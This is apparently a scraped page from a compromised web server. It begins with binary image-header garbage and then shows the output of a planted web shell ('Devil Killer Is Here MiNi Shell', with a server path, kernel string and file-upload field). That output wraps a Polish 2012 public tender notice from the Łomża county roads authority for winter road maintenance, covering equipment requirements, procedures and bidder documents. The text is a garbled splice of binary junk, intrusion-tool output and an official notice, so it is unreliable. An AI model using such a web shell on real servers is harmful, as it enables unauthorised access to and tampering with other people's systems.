JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121030/425342-N-2012.html

<p class="kh_header"><b>Łomża: Zimowe utrzymanie dróg powiatowych na terenie powiatu łomżyńskiego
 w sezonie zimowym 2012/2013</b><br>
<b>Numer ogłoszenia: 425342 - 2012; data zamieszczenia: 30.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Łomży , ul. Poligonowa 30, 18-400 Łomża, woj. podlaskie, tel. 086 2184189.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg powiatowych na terenie powiatu łomżyńskiego
 w sezonie zimowym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest zimowe utrzymanie dróg powiatowych na terenie powiatu łomżyńskiego w sezonie zimowym 2012-2013 z podziałem na poszczególne części:
Część I- Drogi powiatowe na terenie Gminy Wizna (w załączeniu wykaz dróg do utrzymania w tym również ich długość)
Minimum sprzętowe jakim powinien dysponować Wykonawca:
-samochód o ładowności min. 10T z pługiem szczytowym- 2 szt.
- samochód o ładowności min. 10T z pługiem bocznym- 2 szt.
- koparko-ładowarka o poj. łyżki od 1,0 -2,0  m3- 2 szt.
- koparko - ładowarka o pojemności łyżki  powyżej 2,0 m3 - 1 szt
W-w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.
Część II-Drogi powiatowe na terenie Gminy Przytuły (w załączeniu wykaz dróg do utrzymania w tym również ich długość)
Minimum sprzętowe jakim powinien dysponować Wykonawca:
-samochód o ładowności min. 10T z pługiem szczytowym- 2 szt.
- samochód o ładowności min. 10T z pługiem bocznym- 2 szt.
- koparko-ładowarka o poj. łyżki od 1,0 -2,0  m3- 2 szt.
- koparko - ładowarka o pojemności łyżki powyżej 2,0 m3.  - 1 szt
W-w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych. 
Część III-Drogi powiatowe na terenie Gminy Jedwabne z wyłączeniem dróg w granicach miasta Jedwabne (w załączeniu wykaz dróg do utrzymania w tym również ich długość)
Minimum sprzętowe jakim powinien dysponować Wykonawca:
-samochód o ładowności min. 10T z pługiem szczytowym- 2 szt.
- samochód o ładowności min. 10T z pługiem bocznym- 2 szt.
- koparko-ładowarka o poj. łyżki od 1,0 -2,0  m3- 2 szt.
- koparko - ładowarka o pojemności łyżki powyżej  2,0 m3  - 1 szt
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.

Zamawiający zastrzega sobie prawo do zlecenia w awaryjnych sytuacjach wykonania usługi zimowego utrzymania na innych niż w-w drogach powiatowych na terenie pozostałych Gmin z powiatu łomżyńskiego.

Część IV - Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013
- koparko-ładowarka o poj. łyżki do 1,0 m3- 3 szt,
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.

Część V - Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013
- koparko-ładowarka o poj. łyżki od 1,0 -2,0  m3- 3 szt,
W-w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.
Część VI - Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013
- koparko - ładowarka o pojemności łyżki powyżej 2,0 m3  - 2 szt,
W-w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.
Część VII - Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013
- spycharka (ciągnik gąsienicowy) do 100 KM - 1 szt,
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.
Część VIII - Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013
- spycharka (ciągnik gąsienicowy) powyżej 100 KM - 1 szt
W-w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.
Część IX - Wynajem sprzętu wraz z operatorem niezbędnego do zimowego utrzymania dróg w sezonie zimowym 2012/2013
- koparko-ładowarka z pługiem szczytowym min. 5m szerokości - 1 szt
W-w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych.

W przypadku, gdy Wykonawca składa ofertę na więcej niż jedno zadanie, musi posiadać łączną ilość sprzętu wymaganą na każde zadanie.
Do zimowego utrzymania zalicza się:
               1.usuwanie śniegu i błota pozimowego z dróg,
Odśnieżanie dróg ma na celu zmniejszenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi jak opady śniegu, zamiecie, zawieje. Zadaniem wykonawców jest odśnieżanie dróg mające na celu usunięcie śniegu z jezdni i poboczy dróg oraz obiektów towarzyszących, jakimi są zatoki autobusowe, parkingi, itp. - według wskazań zamawiającego.

UWAGA: Za jakość wykonywanych robót i bezawaryjne działanie sprzętu oraz ich zgodność z wymaganiami określonymi w niniejszej specyfikacji, odpowiedzialni są wykonawcy robót.

SPOSÓB WYKONYWANIA ZAMÓWIENIA:
1.	Wezwania Wykonawcy do rozpoczęcia akcji zimowej dokonywane będą telefonicznie przez dyspozytora ZDP w Łomży uprawnionym przedstawicielom wykonawców każdorazowo, z określeniem miejsca i czasu rozpoczęcia działania i zakresu prac
Istnieje możliwość pracy w dniach wolnych i świątecznych, jak również o różnych porach.
2.	Ceny wykazane w ofercie winny obejmować:
- koszty dojazdów i przejazdów sprzętu:
              a. samochodów z pługiem bocznym i szczytowym, koparko - ładowarek, spycharek
- koszty związane z montażem i demontażem osprzętu,
- pracę operatorów także w niedziele i święta oraz w godzinach nadliczbowych 
3.	Dyspozytor z 1-dniowym wyprzedzeniem powiadomi USŁUGODAWCĘ o możliwości przystąpienia do odśnieżania.
4.	Wykonawcy przystąpią do odśnieżania dróg w czasie nie dłuższym niż 2 godziny od chwili potwierdzenia rozpoczęcia pracy przez dyspozytora ZDP w Łomży sprzętem sprawnym technicznie i przystosowanym do odśnieżania dróg oraz wyposażonym w urządzenia niezbędne do pracy na drodze pod ruchem, zgodnie z obowiązującymi przepisami.
5.	Czas pracy liczony jest od momentu podstawienia sprzętu w określone przez dyspozytora ZDP miejsce działania do zakończenia zleconych zadań (tylko efektywne godziny pracy sprzętu) i telefonicznym powiadomieniu o tym dyspozytora.
6.	Całkowite koszty za czas remontu sprzętu i związanego z tym postoju ponoszą wykonawcy.
7.	Podczas świadczenia usług wykonawcy mają obowiązek prowadzić raport pracy sprzętu z podaniem następujących danych:
1.	pieczęć jednostki usługowej,
2.	data świadczenia usługi,
3.	marka i typ pojazdu,
4.	czas pracy pojazdu: od godziny .... do godziny.... = ilość godzin,
5.	numer drogi powiatowej z dokładnym określeniem odcinka oraz ilość przejechanych kilometrów,
6.	czas przestoju na trasie - należy opisać szczegółowo w rubryce Uwagi.
8.	Zapisane dane w raporcie pracy sprzętu i załączony wydruk z urządzenia GPS potwierdzać będzie dyspozytor ZDP w Łomży czytelnym podpisem.
9.	Raporty pracy sprzętu oraz wydruk z urządzenia GPS wykonawcy dołączą do wystawionej faktury zamawiającemu.

PRZYGOTOWANIE SPRZĘTU.
Wykonawca(y), który wygra przetarg jest zobowiązany w ciągu 5 dni od daty podpisania umowy dokonać przeglądu i remontu sprzętu (osprzętu) do odśnieżania. Sprzęt powinien być przygotowany w takim stopniu, aby mógł być gotowy do użycia. 
Nośniki pługów odśnieżnych powinny mieć zamontowane płyty czołowe. 
Pojazdy samochodowe używane do wykonywania prac przy odśnieżaniu dróg powinny być wyposażone w:
1)	ostrzegawczy sygnał świetlny błyskowy barwy żółtej samochodowej, zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003 nr 32 poz. 262 z późn. zm.),
2)	liny holownicze,
3)	łopaty,
4)	łańcuchy przeciwśnieżne na koła napędowe (wskazane),
5)	lemiesze powinny mieć oznaczone skrajne, wystające poza obrys pojazdu, części w skośne pasy wykonane pod kątem 450 barwy na przemian białej i czerwonej. 
Po przygotowaniu sprzętu i nośników należy dokonać próbnego montażu, podczas którego należy sprawdzić w pługach:
1)	dopasowanie elementów łączących z płytą czołową,
2)	działanie mechanizmu podnoszenia,
3)	możliwość swobodnego układania się okładnicy na nawierzchni i przylegania lemiesza,
4)	działania oświetlenia  sygnalizacyjnego,
2.	Nomenklatura - Wspólny Słownik Zamówień (CPV): 
90620000-9     Usługi odśnieżania
60181000-0	Wynajem samochodów ciężarowych wraz z kierowcą.
3. Zamawiający dopuszcza składanie ofert częściowych. 
4. Zamawiający nie dopuszcza składania ofert wariantowych.	
5. Zamawiający nie przewiduje udzielenie zamówień uzupełniających.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz niezbędnego sprzętu przewidzianego do wykonania zamówienia wraz z formą władania danym sprzętem</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniona i podpisana oferta- wg wzoru: załącznik nr 1 do SIWZ wraz z kosztorysem stanowiącym załącznik do niniejszej oferty.
Dokumenty wymagane w przypadku składania oferty wspólnej:
2. Pełnomocnictwo (w przypadku podmiotów występujących wspólnie).
2). W przypadku składania oferty wspólnej dokumenty określone w pkt. IX ust. 2 pkt. 1,2,3,4 tj; 
1)Oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp- wg wzoru: załącznik nr 2 do SIWZ.
2)Kserokopia aktualnego odpisu z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru  w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo Zamówień Publicznych,
3)kserokopia aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4)aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
-muszą być złożone dla każdego z nich przy czym pozostałe wspólnie tj; 
1)Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Pzp- wg wzoru: załącznik nr 3 do SIWZ.
2)Wykaz sprzętu przewidzianego do realizacji zamówienia wraz z informacją o podstawie dysponowania- wg wzoru zał. nr 4 do SWIZ.
Zamawiający żądać będzie przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
3.Dokumenty w przypadku, gdy wykonawca polega na wiedzy i doświadczeniu innych podmiotów:
1)Wykonawca, który polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia
4. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt. 6 tj; 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2)   nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
3) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.;
zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zmiana umowy jest dopuszczalna, o ile nie jest zmianą umowy w stosunku do treści oferty złożonej przez Wykonawcę, z zastrzeżeniem ust.1.
1)	Zmiana umowy jest dopuszczalna jeśli wystąpiły okoliczności, których nie można było przewidzieć wdacie zawarcia umowy, a w szczególności:
a) zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy.
b) urzędowa zmiana stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatlomzynski.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Łomży, ul. Pioligonowa 30, 18-400 łomża, p. nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2012 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Łomży, ul. Pioligonowa 30, 18-400 łomża, p. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zimowe utrzymanie dróg powiatowych na terenie powiatu łomżyńskiego w sezonie zimowym 2012/2013- Drogi powiatowe na terenie Gminy Wizna (w załączeniu wykaz dróg do utrzymania w tym również ich długość).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimum sprzętowe jakim powinien dysponować Wykonawca:
-samochód o ładowności min. 10T z pługiem szczytowym- 2 szt.
- samochód o ładowności min. 10T z pługiem bocznym- 2 szt.
- koparko-ładowarka o poj. łyżki od 1,0 -2,0  m3- 2 szt.
- koparko - ładowarka o pojemności łyżki  powyżej 2,0 m3 - 1 szt
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zimowe utrzymanie dróg powiatowych na terenie powiatu łomżyńskiego w sezonie zimowym 2012/2013 - Drogi powiatowe na terenie Gminy Przytuły (w załączeniu wykaz dróg do utrzymania w tym również ich długość).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimum sprzętowe jakim powinien dysponować Wykonawca:
-samochód o ładowności min. 10T z pługiem szczytowym- 2 szt.
- samochód o ładowności min. 10T z pługiem bocznym- 2 szt.
- koparko-ładowarka o poj. łyżki od 1,0 -2,0  m3- 2 szt.
- koparko - ładowarka o pojemności łyżki powyżej 2,0 m3.  - 1 szt
W/w sprzęt musi być wyposażony w urządzenie GPS wraz z możliwością wydruku danych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zimowe utrzymanie dróg powiatowych na terenie powiatu łomżyńskiego w sezonie zimowym 2012/2013- Drogi powiatowe na terenie Gminy Jedwabne z wyłączeniem dróg w granicach miasta Jedwabne (w załączeniu wykaz dróg do utrzymania w tym również ich długość).</p>
